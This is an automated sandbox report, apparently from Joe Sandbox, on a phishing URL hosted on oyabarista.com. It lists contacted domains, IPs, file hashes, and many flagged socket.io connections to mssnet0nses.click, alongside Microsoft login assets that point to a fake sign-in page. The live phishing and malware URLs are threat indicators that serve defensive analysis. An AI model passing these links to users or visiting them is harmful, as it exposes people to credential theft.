            https://www.oyabarista.com/wp-includes/images/w-logo-blue-white-bg.png0%Avira URL Cloudsafe
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrlkB&sid=LP9pboDna7Lg8G9ZAAfh100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNri5g&sid=gGEhwn_6LXzjgi5BAAfT100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=p_0vHNI0wq1dN5-_AAfl100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrmWh&sid=p_0vHNI0wq1dN5-_AAfl100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrcTW&sid=t010Hy5o6-DrcLMyAAe8100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNraPW100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrgxy100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrlkC&sid=LP9pboDna7Lg8G9ZAAfh100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=EMzR_z9H-w08ZyAdAAfc100%Avira URL Cloudmalware

            Download Network PCAP: filteredfull

            NameIPActiveMaliciousAntivirus DetectionReputation
            a.nel.cloudflare.com
            35.190.80.1
            truefalse
              high
              e329293.dscd.akamaiedge.net
              23.209.72.9
              truefalse
                high
                mssnet0nses.click
                172.64.80.1
                truefalse
                  high
                  d2vgu95hoyrpkh.cloudfront.net
                  3.168.73.27
                  truefalse
                    high
                    cdnjs.cloudflare.com
                    104.17.24.14
                    truefalse
                      high
                      www.oyabarista.com
                      104.21.70.232
                      truetrue
                        unknown
                        s-part-0013.t-0009.t-msedge.net
                        13.107.246.41
                        truefalse
                          high
                          www.google.com
                          142.250.81.228
                          truefalse
                            high
                            a1400.dscb.akamai.net
                            23.44.201.164
                            truefalse
                              high
                              aadcdn.msftauth.net
                              unknown
                              unknownfalse
                                high
                                www.w3schools.com
                                unknown
                                unknownfalse
                                  high
                                  cdn.socket.io
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrizO&sid=2YiBHHEGh1iHOHKNAAfWfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=3KIffrGciGku9LcFAAe0false
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=ceGoATplRk4sAOILAAe3false
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=tT5WNbS8nK_GmKtDAAfCfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.comtrue
                                      unknown
                                      https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrjtk&sid=sOtA6zh2FsG50UT0AAfZfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrcEgfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=LP9pboDna7Lg8G9ZAAfhfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNraio&sid=3KIffrGciGku9LcFAAe0false
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrizQ&sid=2YiBHHEGh1iHOHKNAAfWfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrdFK&sid=cDcq_6oiPpEKxHw5AAe_false
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrhDU&sid=7qMH1QkTS0k0NzOqAAfQfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNre0C&sid=tT5WNbS8nK_GmKtDAAfCfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://a.nel.cloudflare.com/report/v4?s=7GSZgEejbSUHi88UdClQe%2F%2BV1T9BBLhcl6EwBLshMTGr1xYwdAasGxVAeuUdMEdgXJzIIicf1tjqtZYkolmtGSnd%2BVFWyZuQicstyr7sWNmue3C6s0Gn%2FPK31C5CEkXTZINEFA%3D%3Dfalse
                                        high
                                        https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrc-mfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=7qMH1QkTS0k0NzOqAAfQfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrdFJ&sid=cDcq_6oiPpEKxHw5AAe_false
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrfbC&sid=F0YwhNqusdKEacySAAfIfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNre0A&sid=tT5WNbS8nK_GmKtDAAfCfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrfbB&sid=F0YwhNqusdKEacySAAfIfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://a.nel.cloudflare.com/report/v4?s=zbxkUsvSYnfAHmNjZJnAMVTbfcKnJhj9G%2BrrqpVAkJpY78q48K5R0ZkIcyJjZ5KeyfZu4FMpwYwVkKKnYPmUyWpoLIcv1WEvXvUpi%2BuOhpYUjo9ajlOIASFP2HVNK%2B4KoDbVMIo%3Dfalse
                                          high
                                          https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=F0YwhNqusdKEacySAAfIfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrkmv&sid=EMzR_z9H-w08ZyAdAAfcfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrhC-&sid=7qMH1QkTS0k0NzOqAAfQfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrkmu&sid=EMzR_z9H-w08ZyAdAAfcfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrail&sid=3KIffrGciGku9LcFAAe0false
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrjtl&sid=sOtA6zh2FsG50UT0AAfZfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrmGXfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=cDcq_6oiPpEKxHw5AAe_false
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=aHb_mt7ltpbxBIUjAAfLfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrlUifalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNreWwfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=gGEhwn_6LXzjgi5BAAfTfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=2YiBHHEGh1iHOHKNAAfWfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNri5n&sid=gGEhwn_6LXzjgi5BAAfTfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.cssfalse
                                            high
                                            https://www.w3schools.com/w3css/4/w3.cssfalse
                                              high
                                              https://www.oyabarista.com/favicon.icotrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrbdS&sid=ceGoATplRk4sAOILAAe3false
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://www.oyabarista.com/files/images/Logo.pngtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrfLwfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrjeofalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=sOtA6zh2FsG50UT0AAfZfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrgMx&sid=aHb_mt7ltpbxBIUjAAfLfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://cdn.socket.io/4.7.5/socket.io.min.jsfalse
                                                high
                                                https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrikjfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrmWi&sid=p_0vHNI0wq1dN5-_AAflfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrnFWfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrgMy&sid=aHb_mt7ltpbxBIUjAAfLfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrkYNfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrbdU&sid=ceGoATplRk4sAOILAAe3false
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=t010Hy5o6-DrcLMyAAe8false
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrg8Sfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrdm-false
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svgfalse
                                                  high
                                                  https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrbOFfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrcTV&sid=t010Hy5o6-DrcLMyAAe8false
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrhrxfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrlkB&sid=LP9pboDna7Lg8G9ZAAfhfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://www.oyabarista.com/wp-includes/images/w-logo-blue-white-bg.pngtrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNri5g&sid=gGEhwn_6LXzjgi5BAAfTfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrmWh&sid=p_0vHNI0wq1dN5-_AAflfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=p_0vHNI0wq1dN5-_AAflfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNraPWfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrcTW&sid=t010Hy5o6-DrcLMyAAe8false
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrgxyfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrlkC&sid=LP9pboDna7Lg8G9ZAAfhfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://a.nel.cloudflare.com/report/v4?s=1U%2Bk9gUniMBmSCvMHGoFCfN3uCbfV2pr7qw8OajNonIyprtF1UYWICfL7KCAAYXomRfuWcgjDJayA0yM0VupPPpSt20FjvJY16arwC%2FPXr4ho20eT6lp54qNsJB7abZW2qyAVDk%3Dfalse
                                                    high
                                                    https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=EMzR_z9H-w08ZyAdAAfcfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://fontawesome.com/license/freechromecache_119.6.drfalse
                                                      high
                                                      https://fontawesome.comchromecache_119.6.drfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        104.17.24.14
                                                        cdnjs.cloudflare.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        23.209.72.9
                                                        e329293.dscd.akamaiedge.netUnited States
                                                        20940AKAMAI-ASN1EUfalse
                                                        172.67.168.189
                                                        unknownUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        104.21.70.232
                                                        www.oyabarista.comUnited States
                                                        13335CLOUDFLARENETUStrue
                                                        142.250.81.228
                                                        www.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        23.44.201.164
                                                        a1400.dscb.akamai.netUnited States
                                                        20940AKAMAI-ASN1EUfalse
                                                        3.168.73.27
                                                        d2vgu95hoyrpkh.cloudfront.netUnited States
                                                        16509AMAZON-02USfalse
                                                        172.64.80.1
                                                        mssnet0nses.clickUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        35.190.80.1
                                                        a.nel.cloudflare.comUnited States
                                                        15169GOOGLEUSfalse
                                                        23.209.72.31
                                                        unknownUnited States
                                                        20940AKAMAI-ASN1EUfalse
                                                        IP
                                                        192.168.2.5
                                                        Joe Sandbox version:42.0.0 Malachite
                                                        Analysis ID:1650178
                                                        Start date and time:2025-03-27 14:40:12 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 3m 13s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:browseurl.jbs
                                                        Sample URL:https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:18
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal96.phis.win@23/47@24/11
                                                        EGA Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 23.9.183.29, 142.250.65.206, 142.251.32.99, 172.253.62.84, 142.250.80.46, 142.251.35.163, 142.250.81.234, 142.251.32.106, 142.251.35.170, 142.251.40.106, 142.251.40.138, 142.251.40.170, 142.250.80.74, 142.250.80.106, 142.250.176.202, 142.251.40.202, 142.251.40.234, 142.251.41.10, 172.217.165.138, 142.250.65.170, 142.250.65.202, 142.250.65.234, 142.251.40.195, 34.104.35.123, 20.109.210.53, 23.96.180.189, 150.171.27.10, 23.44.203.87, 13.107.246.41
                                                        • Excluded domains from analysis (whitelisted): logincdn.msauth.net, lgincdnmsftuswe2.azureedge.net, slscr.update.microsoft.com, clientservices.googleapis.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, arc.msn.com, clients2.google.com, redirector.gvt1.com, update.googleapis.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net, www.bing.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, aadcdnoriginwus2.afd.azureedge.net, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com
                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com
                                                        No simulations
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):41
                                                        Entropy (8bit):4.180365114215879
                                                        Encrypted:false
                                                        SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                        MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                        SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                        SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                        SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:{"code":1,"message":"Session ID unknown"}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):41
                                                        Entropy (8bit):4.180365114215879
                                                        Encrypted:false
                                                        SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                        MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                        SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                        SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                        SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:{"code":1,"message":"Session ID unknown"}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):41
                                                        Entropy (8bit):4.180365114215879
                                                        Encrypted:false
                                                        SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                        MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                        SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                        SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                        SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:{"code":1,"message":"Session ID unknown"}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                        Category:downloaded
                                                        Size (bytes):1435
                                                        Entropy (8bit):7.8613342322590265
                                                        Encrypted:false
                                                        SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                        MD5:9F368BC4580FED907775F31C6B26D6CF
                                                        SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                        SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                        SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                        Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):41
                                                        Entropy (8bit):4.180365114215879
                                                        Encrypted:false
                                                        SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                        MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                        SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                        SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                        SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:{"code":1,"message":"Session ID unknown"}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (49854)
                                                        Category:downloaded
                                                        Size (bytes):49993
                                                        Entropy (8bit):5.216475744251136
                                                        Encrypted:false
                                                        SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                                        MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                                        SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                                        SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                                        SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://cdn.socket.io/4.7.5/socket.io.min.js
                                                        Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):41
                                                        Entropy (8bit):4.180365114215879
                                                        Encrypted:false
                                                        SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                        MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                        SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                        SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                        SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:{"code":1,"message":"Session ID unknown"}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                                        Category:dropped
                                                        Size (bytes):276
                                                        Entropy (8bit):7.316609873335077
                                                        Encrypted:false
                                                        SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                                        MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                                        SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                                        SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                                        SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):4119
                                                        Entropy (8bit):7.949120703870044
                                                        Encrypted:false
                                                        SSDEEP:96:h3bdWfcmTY+aRF1pXWZL2+42HGhIUc8KeLEd:hgXTY+as02mOB8XLEd
                                                        MD5:000BF649CC8F6BF27CFB04D1BCDCD3C7
                                                        SHA1:D73D2F6D74EC6CDCBAE07955592962E77D8AE814
                                                        SHA-256:6BDB369337AC2496761C6F063BFFEA0AA6A91D4662279C399071A468251F51F0
                                                        SHA-512:73D2EA5FFC572C1AE73F37F8F0FF25E945AFEE8E077B6EE42CE969E575CDC2D8444F90848EA1CB4D1C9EE4BD725AEE2B4576AFC25F17D7295A90E1CBFE6EDFD5
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.oyabarista.com/wp-includes/images/w-logo-blue-white-bg.png
